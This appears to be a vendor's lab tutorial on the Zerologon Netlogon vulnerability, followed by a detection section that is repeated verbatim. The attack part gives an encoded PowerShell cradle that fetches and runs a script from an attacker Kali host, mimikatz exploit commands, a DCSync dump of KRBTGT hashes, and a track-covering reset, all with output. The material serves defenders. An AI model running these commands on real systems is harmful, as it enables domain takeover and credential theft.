Zerologon Exploit Attack
On September 11, 2020, researchers at Secura announced a new vulnerability they named Zerologon. Zerologon enables an unauthenticated attacker to remotely escalate their privileges to Domain Admin, with network access to a domain controller as the only requirement. Every organization running Active Directory was vulnerable to this exploit.
Zerologon exploits an insecure implementation of encryption in the Netlogon Remote Protocol. The researchers discovered that the ComputeNetLogonCredential function utilized a null (all zeros) initialization vector (IV) for the AES algorithm operating in 8-bit cipher feedback mode. When operating in this mode, reusing the same IV leaks information about the plaintext password and is considered insecure.
In normal operation, the weak IV implementation isn't noticeable, but the researchers found that about 1 in 256 authentications with an all-zero plaintext password and an all-zero IV produced an all-zero ciphertext. This means that once an attacker has network access to a domain controller, they can brute-force their way onto the domain controller in about 256 attempts — which takes only 2–3 seconds. Any account lockout policy that might be in place is irrelevant because it applies only to user accounts.
Attack Tutorial: How the Zerologon Attack Works
Code:
# Non-Encoded Command
powershell -Sta -Nop -Window Hidden -Command "iex (New-Object Net.WebClient).DownloadString('http://sbl-kali2/ps-listener')"
# Encoded Command
powershell -Sta -Nop -Window Hidden -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBiAGwALQBrAGEAbABpADIALwBwAHMALQBsAGkAcwB0AGUAbgBlAHIAJwApAA
Code:
PowerShell /powershellcommand:"[DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | Select Name, OSVersion"
Code:
Mimikatz.exe "Lsadump::zerologon /target:sbl-basalt2 /account:sbl-basalt2$ /exploit"
Output:
mimikatz # lsadump::zerologon /target:sbl-basalt2 /account:sbl-basalt2$ /exploit /null
Remote : sbl-basalt2
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: yes
Target : sbl-basalt2
Account: sbl-basalt2$
Type : 6 (Server)
Mode : exploit
Trying to 'authenticate'...
======================================================================================================================================================================
NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000
* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
The adversary can now use this computer account (and the privileges assigned to it) to further compromise Active Directory. For example, they can use these credentials to conduct a DCSync attack to replicate the KRBTGT password hash and mint Golden Tickets. Afterward, the adversary can cover their tracks by running the lsadump::postzerologon command to restore the domain controller to operational status.
Code:
lsadump::dcsync /domain:basalt.igneous.stealthbitslab.com /dc:sbl-basalt2 /user:ba\krbtgt /authuser:sbl-basalt2$ /authdomain:ba /authpassword:"" /authntlm
lsadump::postzerologon /target:10.154.202.2 /account:sbl-basalt2$ /null
Output:
mimikatz # lsadump::dcsync /domain:basalt.igneous.stealthbitslab.com /dc:sbl-basalt2 /user:ba\krbtgt /authuser:sbl-basalt2$ /authdomain:ba /authpassword:"" /authntlm
[DC] 'basalt.igneous.stealthbitslab.com' will be the domain
[DC] 'sbl-basalt2' will be the DC server
[DC] 'ba\krbtgt' will be the user account
[AUTH] Username: sbl-basalt2$
[AUTH] Domain : ba
[AUTH] Password:
[AUTH] Explicit NTLM Mode
--- Output Truncated ---
Credentials:
Hash NTLM: 75557a32b7c51e11361ab752eb9720da
ntlm- 0: 75557a32b7c51e11361ab752eb9720da
lm - 0: cf591b998a49fa934e3fb0dde45c75ff
--- Output Truncated ---
Credentials
aes256_hmac (4096) : 13d99f13f9f984b8af7779f97e9b096897b7d79653369c46dddc9fb6b17c806b
aes128_hmac (4096) : 97605fe38f43efdf348dc16a75acb265
des_cbc_md5 (4096) : c1f7e989dfbcf4fb
--- Output Truncated ---
mimikatz # lsadump::postzerologon /target:10.154.202.2 /account:sbl-basalt2$ /null
Procedure to update AD domain password and its local stored password remotely
mimic `netdom resetpwd`, experimental & best situation after reboot
Target : 10.154.202.2
Account: sbl-basalt2$
* SAM information
Domain name : BA
Domain SID : S-1-5-21-792045605-1560570832-3988794325
User RID : 1122
> Password updated (to FlipFl0p2020)
* Computer stored password
> Password updated (to FlipFl0p2020)
Detect, Mitigate and Respond
- Netlogon service debug logs
- Packet capturing
- Offensive tooling to check for current or past empty passwords
Detection using Netlogon Debug Logs
Netlogon debug logging is very useful for troubleshooting many types of issues in an Active Directory environment — including finding signs of attempted or successful Zerologon exploitation. However, Netlogon debug logs are not enabled by default. Running the commandnltest /DBFlag:20000300
will enable logging of critical error and session setup events.Attempts to exploit the Zerologon vulnerability are evidenced by multiple NetrServerAuthenticate messages from the same host in the same second which result in Bad password. This activity can also be used to detect attempts to exploit the vulnerability against domain controllers that have been patched.
11/10 11:26:48 [CRITICAL] [6784] BA: NetrServerAuthenticate: Bad password 0 for mimikatz on account sbl-basalt2$
If the target domain controller is vulnerable, an eventual success message will also be found:
11/10 11:26:48 [SESSION] [6784] BA: NetrServerAuthenticate returns Success: mimikatz on account sbl-basalt2$ (Negot: 212fffff)
Executing mimikatz (Step 3 above) resets the domain controller's computer account password to a null value. This is evidenced by a NetpServerPasswordSet call to reset the password to a null value. This null value can be readily detected by searching for the string
d98c1dd4 04b2008f 980980e9 7e42f8ec
, which is the MD5 hash of the null password.
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Entered
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Changing password locally
11/10 11:43:49 [SESSION] [2272] Setting Password of 'sbl-basalt2$' to: d98c1dd4 04b2008f 980980e9 7e42f8ec ..............B~
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ returns 0x0
Detection using Network Packet Captures
Network monitoring can also be used to detect attempts to exploit the Zerologon vulnerability. Monitor Netlogon traffic for the NetrServerAuthenticate2 operation where the client credential is all zeros. For example, in Wireshark, the display filternetlogon.opnum == 15 && netlogon.clientcred == 00:00:00:00:00:00:00:00)
will show this traffic.If exploitation is successful, then a packet will exist where the client credential is all zeros but the authentication return code is Status_Success (0x00000000). The Wireshark display filter to find this traffic is
netlogon.opnum == 15 && (netlogon.rc == 0x00000000 || netlogon.clientcred == 00:00:00:00:00:00:00:00)
.Detection using Offensive Tooling
This strategy is particularly useful if you suspect that domain controllers may have been compromised in the recent past and an adversary has covered their tracks. Because this approach uses offensive tooling, it's important to get the right approvals before attempting it. You can use tools likemimikatz
and the DCSync technique to replicate domain controller computer account password hashes from Active Directory. This will show all the stored hashes for the computer account up to the maximum specified by the Enforce Password History setting in the password policy; check for a current or previous hash of 31d6cfe0d16ae931b73c59d7e0c089c0
, which is the NTLM hash for an empty password.
If any domain controllers still operate on an unsupported (and therefore unpatched) version of Windows (2008R2 and below), isolate them and make plans to upgrade or replace them. If technical requirements prevent upgrading to supported versions, separate domains should be used for these legacy systems.
- Netlogon service debug logs
- Packet capturing
- Offensive tooling to check for current or past empty passwords
Detection using Netlogon Debug Logs
Netlogon debug logging is very useful for troubleshooting many types of issues in an Active Directory environment — including finding signs of attempted or successful Zerologon exploitation. However, Netlogon debug logs are not enabled by default. Running the commandnltest /DBFlag:20000300
will enable logging of critical error and session setup events.Attempts to exploit the Zerologon vulnerability are evidenced by multiple NetrServerAuthenticate messages from the same host in the same second which result in Bad password. This activity can also be used to detect attempts to exploit the vulnerability against domain controllers that have been patched.
11/10 11:26:48 [CRITICAL] [6784] BA: NetrServerAuthenticate: Bad password 0 for mimikatz on account sbl-basalt2$
If the target domain controller is vulnerable, an eventual success message will also be found:
11/10 11:26:48 [SESSION] [6784] BA: NetrServerAuthenticate returns Success: mimikatz on account sbl-basalt2$ (Negot: 212fffff)
Executing mimikatz (Step 3 above) resets the domain controller's computer account password to a null value. This is evidenced by a NetpServerPasswordSet call to reset the password to a null value. This null value can be readily detected by searching for the string
d98c1dd4 04b2008f 980980e9 7e42f8ec
, which is the MD5 hash of the null password.
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Entered
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ Changing password locally
11/10 11:43:49 [SESSION] [2272] Setting Password of 'sbl-basalt2$' to: d98c1dd4 04b2008f 980980e9 7e42f8ec ..............B~
11/10 11:43:49 [SESSION] [2272] BA: NetpServerPasswordSet: Comp=mimikatz Acc=sbl-basalt2$ returns 0x0
Detection using Network Packet Captures
Network monitoring can also be used to detect attempts to exploit the Zerologon vulnerability. Monitor Netlogon traffic for the NetrServerAuthenticate2 operation where the client credential is all zeros. For example, in Wireshark, the display filternetlogon.opnum == 15 && netlogon.clientcred == 00:00:00:00:00:00:00:00)
will show this traffic.If exploitation is successful, then a packet will exist where the client credential is all zeros but the authentication return code is Status_Success (0x00000000). The Wireshark display filter to find this traffic is
netlogon.opnum == 15 && (netlogon.rc == 0x00000000 || netlogon.clientcred == 00:00:00:00:00:00:00:00)
.Detection using Offensive Tooling
This strategy is particularly useful if you suspect that domain controllers may have been compromised in the recent past and an adversary has covered their tracks. Because this approach uses offensive tooling, it's important to get the right approvals before attempting it. You can use tools likemimikatz
and the DCSync technique to replicate domain controller computer account password hashes from Active Directory. This will show all the stored hashes for the computer account up to the maximum specified by the Enforce Password History setting in the password policy; check for a current or previous hash of 31d6cfe0d16ae931b73c59d7e0c089c0
, which is the NTLM hash for an empty password.
If any domain controllers still operate on an unsupported (and therefore unpatched) version of Windows (2008R2 and below), isolate them and make plans to upgrade or replace them. If technical requirements prevent upgrading to supported versions, separate domains should be used for these legacy systems.
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.